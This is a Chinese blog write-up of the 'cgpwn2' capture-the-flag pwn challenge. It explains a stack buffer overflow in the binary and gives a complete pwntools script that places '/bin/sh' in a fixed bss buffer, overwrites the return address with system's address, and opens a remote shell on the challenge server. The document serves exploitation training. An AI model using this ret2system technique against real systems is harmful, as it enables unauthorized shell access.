欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

pwn之cgpwn2

程序员文章站 2022-05-15 21:48:20
...

0x01寻找漏洞

checksec

pwn之cgpwn2

ida分析

pwn之cgpwn2
进入hello()函数
pwn之cgpwn2
get()函数存在栈溢出
pwn之cgpwn2

  • name在bss段中,地址固定不变
  • 可以利用fgets函数向其中写东西
  • 程序中调用了system函数,但是没有/bin/sh

0x02分析利用

通过栈溢出漏洞,调用system函数,同时在name中写入“/bin/sh”,把参数地址设置为name的首地址,就可以getshell了

0x03攻击

#!usr/bin/python
from pwn import *

io = remote("111.198.29.45",37884)
# io = process("./cgpwn2")

context.log_level = 'debug'

sys_addr = 0x08048420

io.recvuntil("your name")
io.sendline("/bin/sh")

bin_sh_addr = 0x0804A080

io.recvuntil("leave some message here:")
payload  = "a" * 0x26 + "aaaa" + p32(sys_addr) + "aaaa" + p32(bin_sh_addr)


io.sendline(payload)

io.interactive()

上一篇: easyfmt(xctf)

下一篇: 攻防世界 cgpwn2